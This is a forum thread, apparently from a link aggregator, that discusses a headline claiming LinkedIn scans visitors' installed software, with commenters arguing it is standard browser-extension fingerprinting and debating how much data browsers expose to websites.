Microsoft is running one of the largest corporate espionage operations in modern history. Every time any of LinkedIn’s one billion users visits linkedin.com, hidden code searches their computer for installed software, collects the results, and transmits them to LinkedIn’s servers and to third-party companies including an American-Israeli cybersecurity firm.


First comment from the link:
That is very different from “searches their computer for installed software”
Still don’t really understand why browsers expose this data to sites.
Web browsers are just such a massive security hole.
On the contrary, websites are incredibly sandboxed. It’s damn near impossible to find out anything about the computer. Off the top of my head: Want to know where the file lives that the user just picked? Sure, it’s C:\fakepath\filename. Wanna check the color of a link to see if the user has visited the site before? No need to check. The answer will be ‘false’. Always.
Here’s the information a web server needs to deliver content to a browser:
Everything else is a fucking security hole. There’s no good reason for servers to know what extensions you have installed, what OS you’re running, the dimensions of your browser window, where your mouse cursor is positioned, or any one of a thousand other data points that browsers freely hand over.
The browser can never know what information is needed for a certain use case. So it needs to be permissive in order to not break valid uses.
For instance, your list does not include the things a user clicks on the website. But that’s exactly the info I needed to log recently. A user was complaining that dropdowns would close automatically. We quickly reached the assumption that something was sending two click events. In order to prove that, I started logging the users’ clicks. If there were two in the same millisecond, then it’s definitely not a bug but a hardware (or driver or OS or whatever) issue.
Bug fixing is not a reason to enable massive privacy violations.
There are absolutely reasons. Firefox is done by a reasonable job of anti-fingerprinting, and it’s a fine line to walk to disable as many of those indicators as possible without breaking sites.
Browsers do give away too much, but at least Firefox is working on it. And it’s not extremely straightforward.
If the site doesn’t know the window width of can’t react to mobile or desktop users automatically or scale elements/ change to best for your display.
You need mouse input for hovering effects as well
False. Browsers can announce themselves as desktop or mobile, or even advertise pre-determined fake window and screen sizes for this purpose (in Firefox it’s called “letterboxed” in the hidden settings). There is no need for a server to have any of this information anyway - either the design of the webpage should be responsive by default, or the server can send specifically whichever files for styles the browser specifically asks for, perhaps falling back to a “all.css” or something.
That can all be done 100% client side. The server does not need this information.
If you can do it client side, you can send it to a server…
The difference is intent.
Yes, because web browsers, under current web architecture, allow this.
This is entirely my point.
How would they prevent it? If they allow your app to read a value client side, it can do whatever it wants with it, including sending it.
If your app needs to present different behavior based on user settings, it needs to read it.
They allow this because they are being developed to allow this.
Browsers that don’t allow this in a Web-like system without such functionality (like Gemini) can be written in two days or a week if you don’t hurry.
Or at least take as long as Mosaic or Arena took to become usable.
Enormous resources are being invested into continued development of a platform where users provide valuable feedback.
By the way, ML is long past the point where that data could even be interpreted ambiguously. Those who have the data know exactly who you are and probably some useful traits of what you are thinking the moment you are typing a comment at any big website.
They will always allow it as long as you have javascript or any other code.
Ah I read as the Brower doesn’t need that data. I’d say it needs width (maybe height) but that’s it
But this info talked about in OP is done via client sending the data to a server not the server getting it all the time
Well, I guess it’s technically installed software… but the scope is significantly less than what’s implied from the headline. My immediate reaction was, “how?”
This is basically standard browser fingerprinting, hence why it’s sold for surveillance activities. Linked in is big brother.
DuckDuckGo my friends
DuckDuckGo is still a Chromium browser. Firefox, buddies, Firefox.
WTF is this article? Browser extensions are standard browser fingerprinting data.
Gonna have to agree here. Article headline is rage bait
That sounds… normal? and maybe even sensible, especially if LinkedIn does SSR, since that could allow the servers know how to tailor the content to the specific browser requesting a page.
In what fucking world is it “normal” or “sensible” to scan your browser extensions to decide how to render a page? Please explain.
I’ve been doing web development for 30 years (since the time when “SSR” was just called “building a web app”) and I have not once ever had the desire or need to do this.
The reason is fingerprinting. Verrrry old technique. Adtech stuff. You might collect browser extension, webgl information, CPU core count, screen resolution, IP address, reverse dns, locale, headers, user agent, akamai hash, etc. The reason is so that these metrics can then be enriched to build a consumer profile and used in analytics
I can only think of reasons that are meant to block you based on what you are using to augment your browsing experience.